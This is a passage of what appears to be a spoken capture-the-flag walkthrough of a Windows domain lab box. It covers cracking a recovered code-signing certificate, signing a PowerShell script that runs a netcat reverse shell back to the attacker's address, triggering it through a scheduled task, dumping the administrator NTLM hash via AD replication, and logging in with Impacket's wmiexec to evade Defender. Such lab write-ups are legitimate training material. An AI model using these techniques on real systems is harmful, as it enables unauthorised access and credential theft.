user.txt, and we still can't really run WinPs. I guess we could if we overwrote the like BG info file, but it's now being used by a shell. So I don't even think we could do that. Let me go to share real quick. Does that break it? Let's copy BG info 64.exe. We don't want to copy, we want to move BG info 64.exe to BG info 64.exe.back. Can we do it? No, we cannot, because again, we're using this file for a shell. So that's why we aren't going to try to like run WinPs. And I don't know a good way to know to enumerate this next step, but there is a recycle bin for every user on Windows. And if we go into the recycle bin, we see files. And if I do whoami/all, we get the domain SID for my user. So it ends in 2663. And we see a file in the recycle bin that ends in 2663 as well. And we have to do dir/a. The /a shows hidden files. There is this SID. I don't think we can go into this. If I do cd, access is denied. If we want to see what that user account was, we could use wmic and then user account where SID is equal to this. Get name, full name. No instances. Interesting. So WMIC isn't working. I'm not exactly sure how to check this. I'm guessing it's not working because NetUser's not working. I know there's a user, let's see. Oh, NetUser web did not work. NetUser administrator. That one works. NetUser GinaWild. So I guess we can't enumerate other users on this box. I'm not actually sure how the author did that. Maybe I'll look at it in a separate video. Just want to check one thing real quick. CMD. So if I do CMD ASPX, I just want to get back to this shell, and I want to try NetUser GinaWild. Okay, so I can enumerate users this way. Is there a /all? NetUser GinaWild. Nope. Let's see. Since this has more privileges, I'm going to try the WMI command from the web shell. Maybe it'll work. It does not. So if we do 2 to send that, we still get the no instances available. Okay, so let's just go into SID. So cd this, dir/a, and we can see there is a PFX file. So I'm going to be lazy. I'm just going to copy this PFX file. I think it's actually copy. And we can probably copy to C:\share. And then since it's on the share, we can go back to where we have an SMB client, which I thought was here. Maybe it closed. So connect, do a dir, and we should be able to get this file. There we go. So we have downloaded the PFX file. So let's try to view it. So we do file, escape the $, and it says just data. We can do strings against it, and we don't really get anything. If we XXD it, doesn't really tell us anything either. So I'm used to seeing like it at least identify the certificate. So let's try using OpenSSL, PKCS12, and do an info on this file. And OpenSSL says, hey, enter the import password. So we know this is now an encrypted certificate. So I'm going to use a tool called CrackPKCS12. It's a very creative name for this. And I think we have to actually sudo vi etc resolve.conf because my name server is pointed towards the box. So of course Google's not working. Does it work now? Google? Yep. Crack PKCS12. Go to the GitHub page, and then we can go and opt, get clone to download it. And then we just have to compile it. We do ./configure, then make, and we can do a make install as well. Permission denied. We can sudo that. There we go. So let's go back to where it is, and we can say crack pkcs12-h and see exactly what we need to do. We want the -d for dictionary file. So user share word list rocku.txt. And then I'm guessing it's just the file name after that. So let us put that file there. If you're wondering how I'm cycling through previous arguments, it is Alt and period. And pretty much immediately, we get the password as ABC easy as 123. So let's do this no out command again, input the password, and this time it looks like it decrypts potentially, or at least displays some information. It just says certificate bag PKCS7 and shrouded key bag. So now let's try actually extracting the certificate. I'm going to get this -info command out, and we're going to specify -out cert.pem, and then no keys, ABC easy as 123. And we should have a cert.pem file. If we file it, it says ASCII text. We can view this by just doing the OpenSSL x509, because that's the type of cert this is, cert.pem, and we want to specify text, and we can see information about this certificate. So we see it signed by the WinCorp Hathor CA. And then what else do we see? RSA encryption. It is a code signing certificate. And thinking back, remember when we were enumerating files in the Get-BadPassword directory through our web shell? Let's see, we can show you passwords. We did a type against, I think, run.vbs. Whoops. And we get the authenticode signature block. And then, well, just before that is the actual script. And what this is a VBS script that is going to create a event in the event log with an ID of 444 that is saying check passwords. And the script is really just these 4 lines, right? But because it's signed, it then puts this piece in, so you can't tamper with the script. What I'm guessing is happening here is the event gets created and they have a scheduled task that's looking for this event code. And upon finding it, it will then execute the BadPasswords program, which is probably just a PowerShell script that is also signed. So if we look at the PowerShell script, we see there is another big signature block, and that's just signed PowerShell code. So what we're going to do is create our own PowerShell file that's just going to send us a reverse shell and then sign it and then create that event code and see if it gets executed. And if it does, we should be whatever user runs this PowerShell. And since this is a password audit program, it is the ability to view Active Directory passwords, well, not the passwords themselves, but probably the NTLM hashes. And if we can view the NTLM hashes, then we can probably get the administrator's hash and log in. So let us figure out exactly how this whole certificate signing piece works. Going back to Google, we can just Google like authentic code PowerShell. And they do have a page that has set authentic code signature that just explains how to do this, right? And I bet if we go down, we even get an example. So we have to put the certificate in our certificate store. And in order to import the certificate, we're going to have to give it the password. Now, whenever doing something in PowerShell that requires a password, you can do the incredibly insecure thing of converting a password to this secure string thing. So we want -string, and then what was the password? ABC easy as 123 as plain text -force. And I say this is insecure because a lot of things like log PowerShell nowadays and things like that. So anything that's logging these commands sees all the passwords you're putting in because you're putting it in as an argument. But I digress. So let's go into the recycle bin. I was hoping I could do it that way. Let's see, dir/a. Oh, we're in PowerShell. What if I can recycle bin like that? cd recycle, is it .bin? Let's see, GCI, I think -force shows hidden files in PowerShell. Yep. So we want to go to recycle.bin. What was I doing before? Do I need a backslash? Okay, this is... There we go. Single quotes are the answer. So we can do GCI-force again and go into this. So GCI-force, we should have... Who am I? Web. I am not the user I thought I was. Who am I? GinaWild. Okay. I was on the wrong shell. So let's go back and copy this command and put it in GinaWild's. So I'm just going to do PowerShell. So we enter PowerShell, do the password again. Look at the files. We have the certificate right here. So we can say the certificate is equal to import PFX certificate, and then file path. I'm going to see if I don't need the full path. If I can just do this because I'm in this directory, maybe I can. -password, pass, -cert, store location. And we want cert current user my. If I do cert, I get a certificate here. So it says all I need to do is this set authentic code signature, specify the file, and then specify the certificate. So what I'm going to do is go back to users public, and we can just create a file that does C:\\, what was it? I think share. Let's just do a dir/share. So this is really netcat because we overwrote this file with netcat. So we should be able to do echo C:\share bginfo64.exe and then -e cmd 10.10.14.8 9001. So we echo this. Looks good. And I'm going to call this test.ps1 just because I forget the name I want it. We have this file, right? Okay. We want to look at Get-BadPasswords. And we're going to name the file Get-BadPassword.ps1. Now, I don't think we actually have to have this file named this to begin with, because we could just copy test.ps1 over top of that file. The main reason I'm doing this is whenever I do like certificate signing, I always hate changing anything after I sign something just in case, and the off chance it was using that field somehow. It's just one of those things, like I'm always scared of touching signed files or modifying signed files, even though changing the what I'm saying, the file name shouldn't change the signature. So we sign this. So now if I type this file, we have the signature, and this is a giant sign to blob for just this. I wonder if I can just execute this. Will this work? Get-BadPasswords.ps1 NCLVMP 9001. It does. So all we were doing is just testing it. I wasn't sure if PowerShell would be like weird with just executing a shell command like that. Always nice to test your shells first. So we can copy this into the get-BadPasswords directory. And now when we go to get-BadPasswords and we look at this file, copy, paste. It is a big blob, but all it's doing is a reverse shell. And again, the reason why we're not putting like a PowerShell reverse shell in this file is because of Applocker, because it's denying a lot of things access to the internet, which is our box. But this file name is allowed out through the firewall. So I'm going to listen on this, and then we should be able to just do like C script run.vbs, because this run.vbs is creating the event code that should trigger the get-BadPassword thing to run. And I run this, and we don't get a shell. I was hoping we would. Oh, there we go. It just took a second. And I do who am I? And I am the BPassRunner user. If I look here, I'm GinaWild. So as the BPassRunner user, I have the permission to check for bad passwords. I bet if I go to the Get-BadPassword repo, because that's what this is running, we can see how it works. It's got to do like a PowerShell query to somehow get the NTLM hash of an account. Let's see, replicating AD account with parameters. So it does this get AD REPL account. So I'm going to search this to see exactly what this function is. And it's a DS internal function. So I think this is like sysinternals. And we have -all, -server, SAM account name. So if we do like load up PowerShell, get AD REPL account, -SAM account name, administrator. See what this output looks like. I'm surprised it's taking this long. I wonder if we had some type of syntax error. Maybe we have to specify the domain or something there. I don't think we'd have to specify a PowerShell, like a credential. Let's see. Cannot validate argument on server. Argument is null. Oh, we did not use RL wrap, so I can't use the up and down arrow. So we can do administrator -server wincorp.htb. And here we go. And we also have the password history of this user. But if we look, we have, let's see, what is the NTLM hash? NTLM strong hash. So this is going to be the password for the user, I believe. Or maybe this, B33. I don't know what NTLM strong hash is. This should be it, secrets NT hash. So if I copy this NT hash file, we should now be able to run code as administrator. So what was it? I had it in opt, Impacket, examples, GetTGT. So this is the same exact thing we did with Beatrice Mills, but now we're doing it with administrator to get a ticket. And we need -hashes like this. And we have a administrator ticket. And the reason why I put this semicolon before this, because the format of hashes is landman hash and then NTLM hash. So LM hash, NTLM. LM hashes are not really used, but for some reason, a lot of the tools like that formatting. So you can just blank it out by putting nothing there and then NTLM. So let's do export. Oh, let's just do kerb5cc name is equal to administrator.cc cache. And then we can go back into Impacket examples, WMI exec. And I want to say I just specify the host name, right? Hathor wincorp.htb. And we need a -k administrator at this. I thought that would just use a ticket. We can say -hashes again. Maybe we didn't need to do this whole GetTGT thing. Let's see. What is this going to do? Is it actually going to use a kerberos login and access? It is. So I do who am I? And I'm WinCorp administrator. The reason why I didn't use PSExec because Defender is on this box and Defender picks up PSExec because PSExec drops a file to get code execution. It drops a file, creates a service, uses that service to execute the file it dropped. And because it's dropping the file, Defender flags it. But WMI exec is fileless. It doesn't drop a file. So that's why this one's not picked up by Defender. But we can go users administrator. We could also use like evil WinRM and other tools. Go into desktop. And then we have root.txt. So that's going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time.